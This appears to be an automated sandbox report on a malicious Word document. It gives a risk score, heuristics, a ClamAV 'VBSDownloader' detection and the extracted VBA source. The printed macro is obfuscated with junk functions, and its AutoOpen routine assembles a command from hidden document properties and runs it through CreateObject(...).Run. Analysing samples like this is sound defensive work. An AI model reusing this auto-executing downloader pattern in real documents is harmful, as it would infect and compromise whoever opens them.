MALICIOUS
192
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic indicates an auto-executing macro that uses 'CreateObject', suggesting it's designed to perform actions like downloading and executing a payload. The ClamAV detection 'Doc.Macro.VBSDownloader-6336817-0' further supports this, pointing to a VBS downloader.
Heuristics 8
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
AeyUELwSa = "LyfsCMpymun" CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0 CtHazuBRD = "rycMavpy" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() GnLpEPBGuvx -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11245 bytes |
SHA-256: 0714fc1ff579cafa9f7eff31fd7f01151db470060732224c619b9f668cdfec9a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
236 of 275 identifiers look randomly generated (e.g. 'gTbYDYvnCFK') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function tBXRpcutKGy()
Dim aUyMWUfX()
xhkWNCwR = 7772
ReDim aUyMWUfX(7772)
aUyMWUfX(5756) = YrpPPTVkfY
aUyMWUfX(3925) = bRtPBPVLz
aUyMWUfX(6618) = 9766
aUyMWUfX(1268) = 3639
For xhkWNCwR = 195 To 4834
aUyMWUfX(xhkWNCwR) = xhkWNCwR
Next
End Function
Function bNZHkXXn()
Dim fgwcWMHGyB()
tDkCGBrV = 7093
ReDim fgwcWMHGyB(7093)
fgwcWMHGyB(3791) = vPaDUCnZ
fgwcWMHGyB(5504) = SFmtwbbMGNK
fgwcWMHGyB(1812) = cWEcUyXdZNE
fgwcWMHGyB(2665) = PWUYyzCcKws
fgwcWMHGyB(5997) = 3789
fgwcWMHGyB(6096) = 7664
fgwcWMHGyB(6787) = 9833
fgwcWMHGyB(5173) = 2568
fgwcWMHGyB(4031) = 8692
fgwcWMHGyB(1650) = 1540
For tDkCGBrV = 5297 To 3064
fgwcWMHGyB(tDkCGBrV) = tDkCGBrV
Next
End Function
Function rvKVpBYcu()
Dim tfzRDTrcM()
KSkCSdHXAED = 6811
ReDim tfzRDTrcM(6811)
tfzRDTrcM(2322) = AtztbeErwa
tfzRDTrcM(4292) = BWmDATcRZ
tfzRDTrcM(6219) = SrkHKEnV
tfzRDTrcM(1691) = GNsYckBaA
tfzRDTrcM(1553) = vdWwxkbEfaE
tfzRDTrcM(6398) = 1299
tfzRDTrcM(4502) = 452
tfzRDTrcM(3842) = 2596
tfzRDTrcM(4721) = 6226
For KSkCSdHXAED = 3469 To 302
tfzRDTrcM(KSkCSdHXAED) = KSkCSdHXAED
Next
End Function
Function uTHgFyyV()
Dim hHHLDTgS()
vFEENKuL = 6335
ReDim hHHLDTgS(6335)
hHHLDTgS(4533) = AxczdFwCbpa
hHHLDTgS(3443) = DLkLaUttwk
hHHLDTgS(2456) = 1483
hHHLDTgS(889) = 7409
hHHLDTgS(232) = 6145
For vFEENKuL = 6324 To 1071
hHHLDTgS(vFEENKuL) = vFEENKuL
Next
End Function
Function zyRhMZtEF()
Dim fTnNwrrLgAF()
svuKLgcmw = 4953
ReDim fTnNwrrLgAF(4953)
fTnNwrrLgAF(4597) = cBheKFWLWgx
fTnNwrrLgAF(2506) = XXXdnEykpYH
fTnNwrrLgAF(4417) = wgHZUYBb
fTnNwrrLgAF(4436) = VuUMkDrCwv
fTnNwrrLgAF(2230) = 3094
fTnNwrrLgAF(4629) = 8894
fTnNwrrLgAF(1882) = 6101
fTnNwrrLgAF(1650) = 226
fTnNwrrLgAF(1301) = 9588
fTnNwrrLgAF(3423) = 882
For svuKLgcmw = 1730 To 2054
fTnNwrrLgAF(svuKLgcmw) = svuKLgcmw
Next
End Function
Function kVfxxgeZTcx()
Dim cNhmaTXxm()
BmnMsurwx = 8738
ReDim cNhmaTXxm(8738)
cNhmaTXxm(2107) = rYpHhaXM
cNhmaTXxm(4239) = ssbeCguByfD
cNhmaTXxm(6984) = TyDznyPyeks
cNhmaTXxm(8257) = 312
cNhmaTXxm(133) = 6779
cNhmaTXxm(3494) = 6258
For BmnMsurwx = 5098 To 1531
cNhmaTXxm(BmnMsurwx) = BmnMsurwx
Next
End Function
Function zxDDnHtE()
Dim xxAHkeRpfGX()
BGLnTuFBWd = 2487
ReDim xxAHkeRpfGX(2487)
xxAHkeRpfGX(1258) = FusggnCkM
xxAHkeRpfGX(298) = vPtBDYEkrT
xxAHkeRpfGX(1863) = pgYZFanEX
xxAHkeRpfGX(1971) = TVrCVXdFsrN
xxAHkeRpfGX(332) = tAcsBWNwS
xxAHkeRpfGX(1618) = MzUGSBNYN
xxAHkeRpfGX(789) = 7981
xxAHkeRpfGX(2421) = 7966
xxAHkeRpfGX(138) = 4484
xxAHkeRpfGX(2163) = 9150
xxAHkeRpfGX(1103) = 1880
For BGLnTuFBWd = 438 To 2203
xxAHkeRpfGX(BGLnTuFBWd) = BGLnTuFBWd
Next
End Function
Function fvUmWakZZYK()
Dim TSWvdtKMh()
vwPpbCTn = 7944
ReDim TSWvdtKMh(7944)
TSWvdtKMh(7122) = tgNRdsMwt
TSWvdtKMh(3881) = brbXLzLWtH
TSWvdtKMh(2436) = muXZpUfPGaL
TSWvdtKMh(4599) = mCxafFNNa
TSWvdtKMh(1118) = 3467
TSWvdtKMh(2552) = 6452
TSWvdtKMh(7686) = 6721
For vwPpbCTn = 7878 To 7420
TSWvdtKMh(vwPpbCTn) = vwPpbCTn
Next
End Function
Function CgAdLyezp()
Dim PfDSCfau()
eHBADPnM = 5319
ReDim PfDSCfau(5319)
PfDSCfau(4753) = VXsMybXeaA
PfDSCfau(3102) = CNKLPEdUfm
PfDSCfau(1100) = LHcTEumpTTm
PfDSCfau(2463) = xaBCaVhG
PfDSCfau(2793) = 7975
PfDSCfau(4802) = 5773
PfDSCfau(2858) = 6001
PfDSCfau(4300) = 7075
PfDSCfau(4664) = 8911
For eHBADPnM = 2922 To 4875
PfDSCfau(eHBADPnM) = eHBADPnM
Next
End Function
Function wvFMSCtgSB()
Dim UDYkpKHVvc()
mmGwMYbWa = 3559
ReDim UDYkpKHVvc(3559)
UDYkpKHVvc(2024) = btKHhNusS
UDYkpKHVvc(2015) = uSRnWNHzvW
UDYkpKHVvc(1996) = LnDZbkwhpEY
UDYkpKHVvc(156) = 6808
UDYkpKHVvc(1741) = 3548
UDYkpKHVvc(1625) = 4118
For mmGwMYbWa = 1128 To 3240
UDYkpKHVvc(mmGwMYbWa) = mmGwMYbWa
Next
End Function
Function DKWTEVRRMBN()
Dim cXszFrzwURz()
cyLYRTKSSdC = 7004
ReDim cXszFrzwURz(7004)
cXszFrzwURz(3595) = gtyrxgwS
cXszFrzwURz(2615) = PzfKEZMsBW
cXszFrzwURz(5245) = BNZkwMNR
cXszFrzwURz(4066) = WRscespGr
cXszFrzwURz(3282) = FHMwanSUR
cXszFrzwURz(6547) = 2845
cXszFrzwURz(6240) = 4262
cXszFrzwURz(4314) = 5615
cXszFrzwURz(4342) = 3162
For cyLYRTKSSdC = 3463 To 1101
cXszFrzwURz(cyLYRTKSSdC) = cyLYRTKSSdC
Next
End Function
Sub autoopen()
GnLpEPBGuvx
End Sub
Public Function ugCunPaK(sTzHXsUeNU)
tMmWCUey = "rmMfctLacm"
fKRsfsgZ = "mxnhpYpvVp"
bvyasLRXW = "TebBPckhmY"
vnPCWPapE = "WEeWHwyKR"
ugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + SNnkzEnw
nDgnYNfK = "MyYFnPtwV"
pLddYWdssm = "LufXWggS"
YBeANeFhLS = "USZAcLgMZ"
RvuFfAcCFL = "tndrdSutrZ"
zwPGrDwL = "AawfWVYe"
End Function
Public Function dZmAMvagz()
nXywrxED = "KMEtckFDb"
vXhCxGNDf = "MSryEeLx"
fUpMfRAmTtm = "PDZKSskkZW"
nHLDemZX = "MGRCSwyH"
ZFHHcWys = "hbUxpPAm"
RuUFXAPLH = "fLuFrCSY"
DFBrGCMHmkE = "SFbeZuebNsh"
fbtDPfDett = ugCunPaK("LfRkbnymP") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")
BNVewnkk = "UrpABZmTnr"
naakDWndM = "yKZfYFAYKfy"
amRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")
SekyzxBsr = amRFZWXULCs + fbtDPfDett
aRSdcDurYRy = "AswGHnGuMza"
dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""
End Function
Public Function uMvWKNsFzRd()
uMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + KchPUyEn
MKWVpBeUWF = "drvtgtct"
EfDPwTaYEhf = "VBdbzfhxLfT"
rrttvMkXNcu = "hfZVBCGu"
SfWpGGMC = "xpyLvgFxbmp"
End Function
Public Function GnLpEPBGuvx()
BBVYefYAFEs = "RgsMwNaxxA"
BUCypEWWysB = "VpuHFUHy"
PzpFxCyTEk = "yasuMSNfgZt"
zMUMfyTU = "gtPgLezx"
ygcySdhPWzL = "HcWFdLdNAWU"
AeyUELwSa = "LyfsCMpymun"
CreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0
CtHazuBRD = "rycMavpy"
UxYbtKtt = "UeETzdPx"
YhrwCtAuTuP = "fpxPUYNvbfn"
vkegstHms = "VHVnwvBkLE"
VyZTLaxE = "BbRdVHkfAZU"
End Function
Function KWgbkykHZP()
Dim RfxRMkmmzZ()
apHNVUBpU = 7904
ReDim RfxRMkmmzZ(7904)
RfxRMkmmzZ(1286) = xXcDTbkGSW
RfxRMkmmzZ(2064) = EMsevfdYYka
RfxRMkmmzZ(5661) = EMwVBBWVW
RfxRMkmmzZ(1307) = UBXmtnHhnTE
RfxRMkmmzZ(1470) = TXfbKEVeKC
RfxRMkmmzZ(73) = 5450
RfxRMkmmzZ(965) = 9043
RfxRMkmmzZ(229) = 4176
RfxRMkmmzZ(274) = 7658
RfxRMkmmzZ(6802) = 9707
For apHNVUBpU = 6746 To 204
RfxRMkmmzZ(apHNVUBpU) = apHNVUBpU
Next
End Function
Function KRLsRUxSsUC()
Dim VxVayeNKuY()
kxcsPUvhp = 9719
ReDim VxVayeNKuY(9719)
VxVayeNKuY(5743) = XrTSuwmVh
VxVayeNKuY(2356) = wMrdhDPCbE
VxVayeNKuY(9379) = AGvwbVmarcD
VxVayeNKuY(7940) = 8601
VxVayeNKuY(8579) = 5842
VxVayeNKuY(6218) = 4932
VxVayeNKuY(7419) = 7205
VxVayeNKuY(4097) = 3279
For kxcsPUvhp = 1802 To 5262
VxVayeNKuY(kxcsPUvhp) = kxcsPUvhp
Next
End Function
Function rspLFEBgVZ()
Dim CwwVvdVSvHE()
VSSWyeEK = 4631
ReDim CwwVvdVSvHE(4631)
CwwVvdVSvHE(2943) = KnLswFvuSNH
CwwVvdVSvHE(1407) = rXAPeuFkeE
CwwVvdVSvHE(2405) = rZfSvkrkUs
CwwVvdVSvHE(4079) = EYeXZuXzV
CwwVvdVSvHE(808) = 4846
CwwVvdVSvHE(2419) = 6206
For VSSWyeEK = 1315 To 2061
CwwVvdVSvHE(VSSWyeEK) = VSSWyeEK
Next
End Function
Function KuCFZsbGvfm()
Dim RuxuvpKcyh()
FMCSSBse = 2712
ReDim RuxuvpKcyh(2712)
RuxuvpKcyh(2072) = uHuEphMy
RuxuvpKcyh(2457) = NgyfMkumRn
RuxuvpKcyh(1760) = xfzSnfCFENf
RuxuvpKcyh(703) = rehrZhEW
RuxuvpKcyh(655) = 8514
RuxuvpKcyh(1385) = 6813
For FMCSSBse = 528 To 1670
RuxuvpKcyh(FMCSSBse) = FMCSSBse
Next
End Function
Function FFMwgaYM()
Dim FBdFYFybY()
fDvNBaxmpMw = 2610
ReDim FBdFYFybY(2610)
FBdFYFybY(1373) = PCkLDZhMgc
FBdFYFybY(865) = PehxeTTXude
FBdFYFybY(2007) = 6045
FBdFYFybY(1892) = 1724
FBdFYFybY(96) = 73
FBdFYFybY(2261) = 4950
FBdFYFybY(1865) = 902
For fDvNBaxmpMw = 2409 To 2155
FBdFYFybY(fDvNBaxmpMw) = fDvNBaxmpMw
Next
End Function
Function emrKSCdBkA()
Dim EPrzzbNhTDw()
YCcSTMZV = 4386
ReDim EPrzzbNhTDw(4386)
EPrzzbNhTDw(3407) = LYxmCkPnB
EPrzzbNhTDw(4277) = sbHVZmyS
EPrzzbNhTDw(713) = tehkErHMZ
EPrzzbNhTDw(1392) = bKpbxcVgck
EPrzzbNhTDw(3363) = 5378
EPrzzbNhTDw(2300) = 8663
EPrzzbNhTDw(1330) = 764
EPrzzbNhTDw(2300) = 2578
EPrzzbNhTDw(2226) = 1081
EPrzzbNhTDw(2022) = 3830
For YCcSTMZV = 2370 To 1408
EPrzzbNhTDw(YCcSTMZV) = YCcSTMZV
Next
End Function
Function UGHFGXMDmY()
Dim ptvYBrECdr()
TUcEUXCkuK = 9074
ReDim ptvYBrECdr(9074)
ptvYBrECdr(8210) = HDKVGwRavL
ptvYBrECdr(8972) = gkALasxL
ptvYBrECdr(8712) = hActVXbu
ptvYBrECdr(6182) = vcMkyVUtD
ptvYBrECdr(1196) = EfhGUuVXbdV
ptvYBrECdr(8154) = hyyxpMgkBT
ptvYBrECdr(6025) = 629
ptvYBrECdr(8192) = 190
ptvYBrECdr(6255) = 8494
For TUcEUXCkuK = 2971 To 8016
ptvYBrECdr(TUcEUXCkuK) = TUcEUXCkuK
Next
End Function
Function vsReyNEk()
Dim FGNPxDgR()
dNppxZwPpcb = 4284
ReDim FGNPxDgR(4284)
FGNPxDgR(357) = nLSUvpBn
FGNPxDgR(2296) = GmHrPzWe
FGNPxDgR(2084) = yBpTvyTCAX
FGNPxDgR(3032) = kFXYfefe
FGNPxDgR(3090) = 700
FGNPxDgR(2415) = 7683
FGNPxDgR(3723) = 1696
For dNppxZwPpcb = 3075 To 3180
FGNPxDgR(dNppxZwPpcb) = dNppxZwPpcb
Next
End Function
Function pCHhXMbL()
Dim gTbYDYvnCFK()
kSrFLzhF = 6984
ReDim gTbYDYvnCFK(6984)
gTbYDYvnCFK(1465) = MfhnzDds
gTbYDYvnCFK(1976) = NWtAppGka
gTbYDYvnCFK(3497) = UuXfxzyYkt
gTbYDYvnCFK(5413) = XPmZdgwFmB
gTbYDYvnCFK(5110) = wxwhYeCeBN
gTbYDYvnCFK(2916) = 4252
gTbYDYvnCFK(5255) = 813
gTbYDYvnCFK(222) = 4637
gTbYDYvnCFK(1608) = 5961
gTbYDYvnCFK(4251) = 6310
gTbYDYvnCFK(2972) = 6903
For kSrFLzhF = 3058 To 574
gTbYDYvnCFK(kSrFLzhF) = kSrFLzhF
Next
End Function
Function WhBTkeGK()
Dim YFxKLWsAfp()
wzGAvURR = 2449
ReDim YFxKLWsAfp(2449)
YFxKLWsAfp(1730) = eYhtkWzXts
YFxKLWsAfp(1916) = rWbMKXtXUt
YFxKLWsAfp(503) = 7093
YFxKLWsAfp(1507) = 9360
For wzGAvURR = 1171 To 1136
YFxKLWsAfp(wzGAvURR) = wzGAvURR
Next
End Function
Function SZcFhkaBYck()
Dim xwwxcbkkpw()
pSmPsyteH = 692
ReDim xwwxcbkkpw(692)
xwwxcbkkpw(339) = KxUbDzCKvv
xwwxcbkkpw(192) = UuLeTrtn
xwwxcbkkpw(199) = WSmyTyrgDpm
xwwxcbkkpw(307) = vrVhCxnBFmu
xwwxcbkkpw(511) = yMpmVNbxxZZ
xwwxcbkkpw(270) = 3133
xwwxcbkkpw(489) = 667
xwwxcbkkpw(566) = 887
xwwxcbkkpw(209) = 9747
For pSmPsyteH = 314 To 461
xwwxcbkkpw(pSmPsyteH) = pSmPsyteH
Next
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.